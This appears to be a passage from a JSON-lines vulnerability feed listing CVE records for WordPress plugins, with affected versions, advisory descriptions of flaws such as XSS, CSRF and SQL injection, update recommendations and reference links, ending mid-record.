{"CVE_ID":"CVE-2024-0859","slug":"affiliates-manager","versionImpact":"2.9.34","versionEndExcluding":"2.9.35","description":"The Affiliates Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.9.34. This is due to missing or incorrect nonce validation on the process_bulk_action function in ListAffiliatesTable.php. This makes it possible for unauthenticated attackers to delete affiliates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.9.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/433a03c2-09fd-4ce6-843b-55ad09f4b4f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/433a03c2-09fd-4ce6-843b-55ad09f4b4f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliates-manager\\\/trunk\\\/classes\\\/ListAffiliatesTable.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliates-manager\\\/trunk\\\/classes\\\/ListAffiliatesTable.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028484\\\/affiliates-manager\\\/trunk?contextall=1&old=3015278&old_path=%2Faffiliates-manager%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028484\\\/affiliates-manager\\\/trunk?contextall=1&old=3015278&old_path=%2Faffiliates-manager%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13391","slug":"paid-membership","versionImpact":"2.9.29","versionEndExcluding":"2.9.30","description":"The MicroPayments \u2013 Fans Paysite: Paid Creator Subscriptions, Digital Assets, Tokens Wallet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_content_upload_guest' shortcode in all versions up to, and including, 2.9.29 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224254%40paid-membership&new=3224254%40paid-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224254%40paid-membership&new=3224254%40paid-membership&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b3948ef-11be-450d-ad20-e4bebc16e790?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b3948ef-11be-450d-ad20-e4bebc16e790?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4307","slug":"pardakht-delkhah","versionEndExcluding":"2.9.3","description":"The ?????? ?????? ?????? WordPress plugin before 2.9.3 does not sanitise and escape some parameters, allowing unauthenticated attackers to send a request with XSS payloads, which will be triggered when a high privilege users such as admin visits a page from the plugin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4000ba69-d73f-4c5b-a299-82898304cebb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4000ba69-d73f-4c5b-a299-82898304cebb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4968","slug":"wplegalpages","versionImpact":"2.9.2","versionEndExcluding":"2.9.3","description":"The WPLegalPages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'wplegalpage' shortcode in versions up to, and including, 2.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with author-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2976774\\\/wplegalpages\\\/trunk\\\/public\\\/class-wp-legal-pages-public.php#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2976774\\\/wplegalpages\\\/trunk\\\/public\\\/class-wp-legal-pages-public.php#file0\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68d7b5d0-c777-4ff9-bdef-a7762cfbdf1a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68d7b5d0-c777-4ff9-bdef-a7762cfbdf1a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wplegalpages\\\/tags\\\/2.9.2\\\/public\\\/class-wp-legal-pages-public.php#L150\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wplegalpages\\\/tags\\\/2.9.2\\\/public\\\/class-wp-legal-pages-public.php#L150\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8401","slug":"ht-mega-for-elementor","versionImpact":"2.9.1","versionEndExcluding":"2.9.2","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.9.1 via the 'get_post_data' function. This makes it possible for authenticated attackers, with Author-level access and above, to extract sensitive data including the content of private, password-protected, and draft posts and pages.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.9.1\\\/htmega-blocks\\\/includes\\\/classes\\\/Manage_Styles.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.9.1\\\/htmega-blocks\\\/includes\\\/classes\\\/Manage_Styles.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336533\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336533\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9540b339-3386-4ee8-8141-acb9f3d83772?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9540b339-3386-4ee8-8141-acb9f3d83772?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8151","slug":"ht-mega-for-elementor","versionImpact":"2.9.1","versionEndExcluding":"2.9.2","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.9.1 via the 'save_block_css' function. This makes it possible for authenticated attackers, with Author-level access and above, to create CSS files in any directory, and delete CSS files in any directory in a Windows environment.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.9.1\\\/htmega-blocks\\\/includes\\\/classes\\\/Manage_Styles.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.9.1\\\/htmega-blocks\\\/includes\\\/classes\\\/Manage_Styles.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336533\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336533\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b3e93bf-af5c-4ca3-a531-2d91df880c51?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b3e93bf-af5c-4ca3-a531-2d91df880c51?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8068","slug":"ht-mega-for-elementor","versionImpact":"2.9.1","versionEndExcluding":"2.9.2","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to unauthorized modification and loss of data due to an improper capability check on the 'ajax_trash_templates' function in all versions up to, and including, 2.9.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary attachment files, and move arbitrary posts, pages, and templates to the Trash.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.9.0\\\/admin\\\/include\\\/class.theme-builder.php#L625\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.9.0\\\/admin\\\/include\\\/class.theme-builder.php#L625\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336533\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336533\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9cf6dae-572f-4eaa-8e8a-bca9e74fe738?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9cf6dae-572f-4eaa-8e8a-bca9e74fe738?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13378","slug":"gravityforms","versionImpact":"2.9.1.3","versionEndExcluding":"2.9.2","description":"The Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018style_settings\u2019 parameter in versions 2.9.0.1 up to, and including, 2.9.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The attack is only successful in the Chrome web browser, and requires directly browsing the media file via the attachment post.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.gravityforms.com\\\/gravityforms-change-log\\\/\",\"name\":\"https:\\\/\\\/docs.gravityforms.com\\\/gravityforms-change-log\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f884ea43-e1a5-4b44-8a24-f68f71b0fcfb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f884ea43-e1a5-4b44-8a24-f68f71b0fcfb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13377","slug":"gravityforms","versionImpact":"2.9.1.3","versionEndExcluding":"2.9.2","description":"The Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018alt\u2019 parameter in all versions up to, and including, 2.9.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.gravityforms.com\\\/gravityforms-change-log\\\/\",\"name\":\"https:\\\/\\\/docs.gravityforms.com\\\/gravityforms-change-log\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03623f00-2c3c-4590-92fe-a5eaac15b944?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03623f00-2c3c-4590-92fe-a5eaac15b944?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0318","slug":"ultimate-member","versionImpact":"2.9.1","versionEndExcluding":"2.9.2","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.9.1 through different error messages in the responses. This makes it possible for unauthenticated attackers to exfiltrate data from wp_usermeta table.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.9.1\\\/includes\\\/core\\\/um-actions-form.php#L944\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.9.1\\\/includes\\\/core\\\/um-actions-form.php#L944\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ee149bf-ffa3-4906-8be2-9c3c40b28287?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ee149bf-ffa3-4906-8be2-9c3c40b28287?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0308","slug":"ultimate-member","versionImpact":"2.9.1","versionEndExcluding":"2.9.2","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the search parameter in all versions up to, and including, 2.9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.9.1\\\/includes\\\/core\\\/class-member-directory.php#L1877\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.9.1\\\/includes\\\/core\\\/class-member-directory.php#L1877\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3e5bb98-2652-499a-b8cd-4ebfe1c1d890?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3e5bb98-2652-499a-b8cd-4ebfe1c1d890?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10567","slug":"ti-woocommerce-wishlist","versionImpact":"2.9.1","versionEndExcluding":"2.9.2","description":"The TI WooCommerce Wishlist plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wizard' function in all versions up to, and including, 2.9.1. This makes it possible for unauthenticated attackers to create new pages, modify plugin settings, and perform limited options updates.","recommendation":"Update to version 2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199516\\\/ti-woocommerce-wishlist\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199516\\\/ti-woocommerce-wishlist\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a5f2e1a-2216-4885-9b74-a08142816f2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a5f2e1a-2216-4885-9b74-a08142816f2b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10537","slug":"wp-user-manager","versionImpact":"2.9.11","versionEndExcluding":"2.9.12","description":"The WP User Manager \u2013 User Profile Builder & Membership plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the validate_user_meta_key() function in all versions up to, and including, 2.9.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enumerate user meta keys.","recommendation":"Update to version 2.9.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194404\\\/wp-user-manager\\\/trunk\\\/includes\\\/actions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194404\\\/wp-user-manager\\\/trunk\\\/includes\\\/actions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e9a5b7e-db74-4c66-a659-85b2509fded4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e9a5b7e-db74-4c66-a659-85b2509fded4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10216","slug":"wp-user-manager","versionImpact":"2.9.11","versionEndExcluding":"2.9.12","description":"The WP User Manager \u2013 User Profile Builder & Membership plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'add_sidebar' and 'remove_sidebar' functions in all versions up to, and including, 2.9.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add or remove a Carbon Fields custom sidebar if the Carbon Fields (carbon-fields) plugin is installed.","recommendation":"Update to version 2.9.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-manager\\\/trunk\\\/vendor-dist\\\/htmlburger\\\/carbon-fields\\\/core\\\/Libraries\\\/Sidebar_Manager\\\/Sidebar_Manager.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-manager\\\/trunk\\\/vendor-dist\\\/htmlburger\\\/carbon-fields\\\/core\\\/Libraries\\\/Sidebar_Manager\\\/Sidebar_Manager.php#L102\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-manager\\\/trunk\\\/vendor-dist\\\/htmlburger\\\/carbon-fields\\\/core\\\/Libraries\\\/Sidebar_Manager\\\/Sidebar_Manager.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-manager\\\/trunk\\\/vendor-dist\\\/htmlburger\\\/carbon-fields\\\/core\\\/Libraries\\\/Sidebar_Manager\\\/Sidebar_Manager.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194404\\\/wp-user-manager\\\/trunk\\\/includes\\\/class-wp-user-manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194404\\\/wp-user-manager\\\/trunk\\\/includes\\\/class-wp-user-manager.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ab4e9c6-68b0-4113-bff0-c1d3c2d3dea4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ab4e9c6-68b0-4113-bff0-c1d3c2d3dea4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0631","slug":"paid-memberships-pro","versionEndExcluding":"2.9.12","description":"The Paid Memberships Pro WordPress plugin before 2.9.12 does not prevent subscribers from rendering shortcodes that concatenate attributes directly into an SQL query.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19ef92fd-b493-4488-91f0-e6ba51362f79\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19ef92fd-b493-4488-91f0-e6ba51362f79\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13689","slug":"uncode-core","versionImpact":"2.9.1.6","versionEndExcluding":"2.9.1.7","description":"The Uncode Core plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.9.1.6. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 2.9.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/support.undsgn.com\\\/hc\\\/en-us\\\/articles\\\/213454129-Change-Log\",\"name\":\"https:\\\/\\\/support.undsgn.com\\\/hc\\\/en-us\\\/articles\\\/213454129-Change-Log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0a61e11-1137-4da0-8580-0a44300b1542?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0a61e11-1137-4da0-8580-0a44300b1542?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4102","slug":"bb-plugin","versionImpact":"2.9.1","versionEndExcluding":"2.9.1.1","description":"The Beaver Builder Plugin (Starter Version) plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'save_enabled_icons' function in all versions up to, and including, 2.9.1. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability was partially patched in version 2.9.1.","recommendation":"Update to version 2.9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2eb4608f-fa4f-444c-a857-c9059777a70b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2eb4608f-fa4f-444c-a857-c9059777a70b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/?utm_medium=bb-lite&utm_source=repo-readme&utm_campaign=repo-changelog-page\",\"name\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/?utm_medium=bb-lite&utm_source=repo-readme&utm_campaign=repo-changelog-page\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5744","slug":"very-simple-google-maps","versionImpact":"2.9","versionEndExcluding":"2.9.1","description":"The Very Simple Google Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vsgmap' shortcode in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fca7837c-ad24-44ce-b073-7df3f8bc4300?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fca7837c-ad24-44ce-b073-7df3f8bc4300?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/very-simple-google-maps\\\/trunk\\\/very-simple-google-maps.php?rev=2941389#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/very-simple-google-maps\\\/trunk\\\/very-simple-google-maps.php?rev=2941389#L22\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982539\\\/very-simple-google-maps#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982539\\\/very-simple-google-maps#file1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10362","slug":"ultimate-social-media-icons","versionImpact":"2.9.0","versionEndExcluding":"2.9.1","description":"The Social Media Share Buttons & Social Sharing Icons WordPress plugin before 2.9.1 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/701f653b-a0c3-49b4-972e-f26c3633ad92\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/701f653b-a0c3-49b4-972e-f26c3633ad92\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5530","slug":"woolentor-addons","versionImpact":"2.9.0","versionEndExcluding":"2.9.1","description":"The ShopLentor \u2013 WooCommerce Builder for Elementor & Gutenberg +12 Modules \u2013 All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's WL: Product Horizontal Filter widget in all versions up to, and including, 2.9.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fc2c2df-b590-413f-ba07-5aa645d069b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fc2c2df-b590-413f-ba07-5aa645d069b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.8.9\\\/includes\\\/addons\\\/wl_product_horizontal_filter.php#L1091\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.8.9\\\/includes\\\/addons\\\/wl_product_horizontal_filter.php#L1091\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100260\\\/woolentor-addons\\\/trunk\\\/includes\\\/addons\\\/wl_product_horizontal_filter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100260\\\/woolentor-addons\\\/trunk\\\/includes\\\/addons\\\/wl_product_horizontal_filter.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1962","slug":"cm-download-manager","versionEndExcluding":"2.9.1","description":"The CM Download Manager  WordPress plugin before 2.9.1 does not have CSRF checks in some places, which could allow attackers to make logged in admins edit downloads via a CSRF attack","recommendation":"Update to version 2.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/469486d4-7677-4d66-83c0-a6b9ac7c503b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/469486d4-7677-4d66-83c0-a6b9ac7c503b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1512","slug":"powerpack-lite-for-elementor","versionImpact":"2.9.0","versionEndExcluding":"2.9.1","description":"The PowerPack Elementor Addons (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom Cursor Extension in all versions up to, and including, 2.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262339\\\/powerpack-lite-for-elementor\\\/trunk\\\/assets\\\/js\\\/pp-custom-cursor.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262339\\\/powerpack-lite-for-elementor\\\/trunk\\\/assets\\\/js\\\/pp-custom-cursor.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90579442-b05c-459e-93cb-f4883b6472ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90579442-b05c-459e-93cb-f4883b6472ff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10528","slug":"ultimate-member","versionImpact":"2.8.9","versionEndExcluding":"2.9.0","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to unauthorized profile picture updates due to a missing capability check on the wp_ajax_um_resize_image() and ajax_resize_image() functions in all versions up to, and including, 2.8.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the profile pictures of other users.","recommendation":"Update to version 2.9.0, or a newer patched 